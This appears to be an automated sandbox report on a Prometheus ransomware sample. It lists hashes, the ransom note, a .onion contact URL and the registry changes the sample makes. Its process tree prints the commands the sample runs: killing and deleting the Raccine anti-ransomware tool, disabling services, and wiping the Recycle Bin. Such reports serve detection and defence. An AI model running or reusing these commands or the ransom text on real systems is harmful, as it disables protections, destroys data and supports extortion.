Analysis
-
max time kernel
133s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:40
Static task
static1
Behavioral task
behavioral1
Sample
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Resource
win10v20210410
General
-
Target
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
-
Size
123KB
-
MD5
14de196b28bc12b5e571ea8303668041
-
SHA1
7f400d518bd716e75c795de47e1dc67f9d29d582
-
SHA256
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b
-
SHA512
1fe6f312057ca6debe2552f02c231cacff60f79fc40c053c26500f58fe4575fd4c820883bb4203ead2e9db00402883389d72853f304d3e198a333ef49e387b6f
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
prometheus
http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
prometheus
http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid Process 4968 icacls.exe 4656 icacls.exe 4996 icacls.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 4480 taskkill.exe 4584 taskkill.exe 4636 taskkill.exe 5052 taskkill.exe 3948 taskkill.exe 2120 taskkill.exe 4104 taskkill.exe 4412 taskkill.exe 4188 taskkill.exe 3968 taskkill.exe 1324 taskkill.exe 4688 taskkill.exe 4780 taskkill.exe 3984 taskkill.exe 3388 taskkill.exe 428 taskkill.exe 3952 taskkill.exe 4988 taskkill.exe 4456 taskkill.exe 4792 taskkill.exe 3984 taskkill.exe 384 taskkill.exe 4212 taskkill.exe 4332 taskkill.exe 4276 taskkill.exe 4516 taskkill.exe 4612 taskkill.exe 3864 taskkill.exe 3848 taskkill.exe 4140 taskkill.exe 3856 taskkill.exe 4504 taskkill.exe 4824 taskkill.exe 4728 taskkill.exe 3960 taskkill.exe 4224 taskkill.exe 4268 taskkill.exe 4856 taskkill.exe 2136 taskkill.exe 3868 taskkill.exe 3400 taskkill.exe 4512 taskkill.exe 4740 taskkill.exe 5064 taskkill.exe 1296 taskkill.exe 1012 taskkill.exe 3116 taskkill.exe 752 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exepid Process 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 1012 taskkill.exe Token: SeDebugPrivilege 3864 taskkill.exe Token: SeDebugPrivilege 3960 taskkill.exe Token: SeDebugPrivilege 2136 taskkill.exe Token: SeDebugPrivilege 3388 taskkill.exe Token: SeDebugPrivilege 428 taskkill.exe Token: SeDebugPrivilege 2120 taskkill.exe Token: SeDebugPrivilege 3952 taskkill.exe Token: SeDebugPrivilege 3116 taskkill.exe Token: SeDebugPrivilege 1324 taskkill.exe Token: SeDebugPrivilege 384 taskkill.exe Token: SeDebugPrivilege 3848 taskkill.exe Token: SeDebugPrivilege 752 taskkill.exe Token: SeDebugPrivilege 3868 taskkill.exe Token: SeDebugPrivilege 3400 taskkill.exe Token: SeDebugPrivilege 4104 taskkill.exe Token: SeDebugPrivilege 4140 taskkill.exe Token: SeDebugPrivilege 4212 Conhost.exe Token: SeDebugPrivilege 4224 Conhost.exe Token: SeDebugPrivilege 4332 taskkill.exe Token: SeDebugPrivilege 4412 taskkill.exe Token: SeDebugPrivilege 4480 taskkill.exe Token: SeDebugPrivilege 4512 taskkill.exe Token: SeDebugPrivilege 4584 taskkill.exe Token: SeDebugPrivilege 4636 taskkill.exe Token: SeDebugPrivilege 4688 taskkill.exe Token: SeDebugPrivilege 4780 taskkill.exe Token: SeDebugPrivilege 4792 taskkill.exe Token: SeDebugPrivilege 4856 taskkill.exe Token: SeDebugPrivilege 4988 taskkill.exe Token: SeDebugPrivilege 5052 taskkill.exe Token: SeDebugPrivilege 5064 taskkill.exe Token: SeDebugPrivilege 3948 taskkill.exe Token: SeDebugPrivilege 1296 taskkill.exe Token: SeDebugPrivilege 4188 taskkill.exe Token: SeDebugPrivilege 4276 taskkill.exe Token: SeDebugPrivilege 4268 taskkill.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 3856 taskkill.exe Token: SeDebugPrivilege 3968 taskkill.exe Token: SeDebugPrivilege 4456 taskkill.exe Token: SeDebugPrivilege 4504 taskkill.exe Token: SeDebugPrivilege 4516 taskkill.exe Token: SeDebugPrivilege 4612 taskkill.exe Token: SeDebugPrivilege 4824 taskkill.exe Token: SeDebugPrivilege 4728 taskkill.exe Token: SeDebugPrivilege 4640 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exepid Process 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exepid Process 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exedescription pid Process procid_target PID 1808 wrote to memory of 3984 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 79 PID 1808 wrote to memory of 3984 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 79 PID 1808 wrote to memory of 3984 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 79 PID 1808 wrote to memory of 8 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 81 PID 1808 wrote to memory of 8 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 81 PID 1808 wrote to memory of 8 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 81 PID 1808 wrote to memory of 1096 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 83 PID 1808 wrote to memory of 1096 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 83 PID 1808 wrote to memory of 1096 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 83 PID 1808 wrote to memory of 2132 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 85 PID 1808 wrote to memory of 2132 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 85 PID 1808 wrote to memory of 2132 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 85 PID 1808 wrote to memory of 3488 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 87 PID 1808 wrote to memory of 3488 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 87 PID 1808 wrote to memory of 3488 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 87 PID 1808 wrote to memory of 584 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 89 PID 1808 wrote to memory of 584 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 89 PID 1808 wrote to memory of 584 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 89 PID 1808 wrote to memory of 3284 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 91 PID 1808 wrote to memory of 3284 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 91 PID 1808 wrote to memory of 3284 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 91 PID 1808 wrote to memory of 2780 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 93 PID 1808 wrote to memory of 2780 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 93 PID 1808 wrote to memory of 2780 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 93 PID 1808 wrote to memory of 2760 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 94 PID 1808 wrote to memory of 2760 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 94 PID 1808 wrote to memory of 2760 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 94 PID 1808 wrote to memory of 3968 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 97 PID 1808 wrote to memory of 3968 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 97 PID 1808 wrote to memory of 3968 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 97 PID 1808 wrote to memory of 3772 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 99 PID 1808 wrote to memory of 3772 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 99 PID 1808 wrote to memory of 3772 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 99 PID 1808 wrote to memory of 3856 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 101 PID 1808 wrote to memory of 3856 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 101 PID 1808 wrote to memory of 3856 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 101 PID 1808 wrote to memory of 2104 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 106 PID 1808 wrote to memory of 2104 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 106 PID 1808 wrote to memory of 2104 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 106 PID 1808 wrote to memory of 364 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 102 PID 1808 wrote to memory of 364 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 102 PID 1808 wrote to memory of 364 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 102 PID 1808 wrote to memory of 1012 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 107 PID 1808 wrote to memory of 1012 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 107 PID 1808 wrote to memory of 1012 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 107 PID 1808 wrote to memory of 3864 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 108 PID 1808 wrote to memory of 3864 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 108 PID 1808 wrote to memory of 3864 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 108 PID 1808 wrote to memory of 3960 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 110 PID 1808 wrote to memory of 3960 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 110 PID 1808 wrote to memory of 3960 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 110 PID 1808 wrote to memory of 3328 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 113 PID 1808 wrote to memory of 3328 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 113 PID 1808 wrote to memory of 3328 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 113 PID 1808 wrote to memory of 2136 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 115 PID 1808 wrote to memory of 2136 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 115 PID 1808 wrote to memory of 2136 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 115 PID 1808 wrote to memory of 3388 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 117 PID 1808 wrote to memory of 3388 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 117 PID 1808 wrote to memory of 3388 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 117 PID 1808 wrote to memory of 428 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 119 PID 1808 wrote to memory of 428 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 119 PID 1808 wrote to memory of 428 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 119 PID 1808 wrote to memory of 2120 1808 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe 121 -
System policy modification 1 TTPs 2 IoCs
Processes:
9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" 9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1808 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:2132
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:3488
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:584
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:3284
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:2780
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:2760
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:3968
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3772
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:3856
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:364
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵PID:2104
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
